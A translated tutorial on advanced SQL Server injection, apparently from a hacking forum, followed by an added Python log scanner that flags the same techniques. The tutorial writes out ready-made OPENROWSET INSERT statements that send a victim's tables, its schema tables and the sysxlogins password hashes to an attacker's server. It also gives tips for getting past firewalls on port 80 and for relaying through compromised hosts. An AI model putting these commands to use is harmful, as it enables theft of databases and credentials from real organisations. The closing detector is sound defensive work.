Author: apachy
Having some spare time, I am writing a short piece on slightly more advanced SQL injection against SQL Server. I assume you already know the basic concepts of SQL injection.
[Finding a target] Now that most people are aware of the SQL injection threat and have patched their code, it can be hard to find an injection point. If you want to succeed you need calm and patience, and of course a little luck ;) If source code is available, go through it patiently and carefully. In a huge system that is hard work, but a single vulnerability is enough to threaten the whole system. A thousand-mile dike collapses from an ant hole.
This article mainly summarizes some advanced uses of injection. How to find the vulnerability is not the topic here; you can refer to my earlier article "Discover Alternative INJECTION". Injection does not exist only in web pages, applications have it too, so do not lose the forest for the trees. Any technique deserves to be understood thoroughly; only then can it be put to full use. Now to the advanced part:
First, opening a remote database. Basic syntax:
SELECT * FROM OPENROWSET('sqloledb', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1')
Parameters: (1) OLE DB provider name (2) connection string (OLE DB data source or ODBC connection string) (3) SQL statement
The connection string can specify any address and port to connect to, for example:
select * from openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from table')
Second, copying the database. With an injection vulnerability you can extract information from the database through exhaustive probing. Done by hand, this is used to recover a few fields of limited length (such as cracking a password). To make it simpler, one writes a program to automate the process. Later I found that even with a program some things remain awkward, such as dumping all the data of a "backup" field in the database. Is there no simpler way? Of course there is: copy the entire database! Prerequisites: SQL Server installed on your own machine, and a public IP. To copy the target host's entire database, you first make the target host establish a connection to the database on your machine (how to make the target host open a remote connection was covered above), and then INSERT all the remote tables into local tables.
Basic syntax:
INSERT INTO OPENROWSET('sqloledb', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1') select * from table2
This statement copies all the data in table2 on the target host into table1 in the remote database. In practice the IP address and port in the connection string are adjusted to point where you need, for example:
INSERT INTO OPENROWSET('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from table1') select * from table2
Note that for this statement to succeed, table1 must already exist locally, and its structure must match table2 on the target host. To obtain the structure of table2 you have to start from the system tables, so you need some knowledge of how SQL Server system databases are built. When a new user database is created it contains some system tables holding information about that database: table information, column names, column types, stored procedures and so on are stored in sysdatabases, sysobjects and syscolumns. Therefore, by copying these key system tables you obtain the structure of the database on the target host. The method is as follows:
INSERT INTO OPENROWSET('sqloledb', 'uid=sa;pwd=Hack3r;network=dbmssocn;address=202.100.100.1,1433;', 'select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _syscolumns') select * from user_database.dbo.syscolumns
After that you can view the structure of the target host's database from your local database. The rest is easy and needs little explanation: copy the database:
INSERT INTO OPENROWSET('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from table1') select * from database..table1
INSERT INTO OPENROWSET('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from table2') select * from database..table2
and so on for the remaining tables.
Third, copying the hash table (HASH)
This is really an extension of copying the database described above. The login passwords are stored in sysxlogins. As follows:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins
Once you have the hashes, brute-force cracking can be carried out. That requires a little luck and a lot of time.
Fourth, the most fundamental premise of all the methods above is that the target host must be able to connect to your local host, so the firewall has to be taken into account. Before any of the above moves, you must first determine one thing: is there a firewall?
When a firewall restricts the connection, you can try changing the port, for example to 80, so that the connection looks to the firewall like ordinary web access:
INSERT INTO OPENROWSET('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,80;', 'select * from table1') select * from table2
The same applies to ports 23, 25 and others. You can also run Firewalk to probe the firewall rules and help determine which connection methods are available. The local SQL Server then needs to listen on the modified port, or local port forwarding must be set up.
Another situation to consider is whether SQL Server and the web server are on the same host. There are many ways to tell: scan the target host directly to see whether port 1433 is open; or make SQL connect back to an arbitrary local port, see whether your local firewall raises an alert, and check whether the source IP matches the web server's IP. If they are not on the same host, you further need to determine whether the SQL host has a public IP, whether it can connect outward, and whether firewall rules restrict it (if so, probe the rules). If you are unlucky and none of these methods yields a connection, for example because the firewall rules only allow intranet hosts to reach the SQL host, then you may need a relay: a host that can reach the Internet, used for port forwarding. Of course, the prerequisite is that you have first obtained administrator privileges on that host. This situation is complicated and is not discussed in detail here.
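As an added defender-side example (not part of apachy's article), here is a Python check that scans captured T-SQL statements for the OPENROWSET/OPENDATASOURCE patterns described above, pulls the destination host and port out of the connection string, and flags outbound INSERT copies, non-standard ports such as 80, and the system tables used for schema and hash copying. The statement log and the password value are constructed.

```python
import re

# Constructed sample of captured T-SQL statements (e.g. from a SQL Server
# trace or a web-tier query log); not real traffic.
SAMPLE_STATEMENTS = [
    "select name from products where id = 7",
    "insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=x;network=dbmssocn;"
    "address=202.100.100.1,1433;','select * from _sysxlogins') "
    "select * from master.dbo.sysxlogins",
    "INSERT INTO OPENROWSET('sqloledb','uid=sa;pwd=x;network=dbmssocn;"
    "address=202.100.100.1,80;','select * from table1') select * from table2",
    "select * from openrowset('sqloledb','server=srv;uid=sa;pwd=x',"
    "'select * from table1')",
]

# Matches an optional leading INSERT INTO, the ad hoc query function, the
# provider name and the connection string (first two quoted arguments).
OPENROWSET_RE = re.compile(
    r"(?P<insert>insert\s+into\s+)?open(?:rowset|datasource)\s*\(\s*"
    r"'(?P<provider>[^']*)'\s*,\s*'(?P<conn>[^']*)'",
    re.IGNORECASE,
)
# System tables whose copying leaks schema or login hashes.
SENSITIVE_SOURCES = ("sysxlogins", "sysdatabases", "sysobjects", "syscolumns")


def parse_conn(conn):
    """Split 'k=v;k=v' into a dict with lowercase keys, tolerating spaces."""
    kv = {}
    for part in conn.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            kv[k.strip().lower()] = v.strip()
    return kv


def analyze(stmt):
    """Return a finding for a statement using OPENROWSET/OPENDATASOURCE, else None."""
    m = OPENROWSET_RE.search(stmt)
    if not m:
        return None
    kv = parse_conn(m.group("conn"))
    target = kv.get("address") or kv.get("server") or kv.get("data source") or ""
    host, _, port = target.partition(",")  # 'address=host,port' form
    port = port.strip() or "1433"          # default SQL Server port
    leaks = [t for t in SENSITIVE_SOURCES
             if re.search(r"\b" + t + r"\b", stmt, re.IGNORECASE)]
    return {
        "outbound_copy": m.group("insert") is not None,
        "host": host.strip(),
        "port": port,
        "nonstandard_port": port != "1433",
        "sensitive_tables": leaks,
    }


def scan(statements):
    """Return (statement, finding) pairs for every suspicious statement."""
    findings = []
    for s in statements:
        f = analyze(s)
        if f:
            findings.append((s, f))
    return findings
```

Blocking the technique outright is a server-side configuration matter (ad hoc distributed queries are off by default on modern SQL Server); this check is for spotting attempts in logs where the feature is still enabled.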
That is all for now; to be continued ....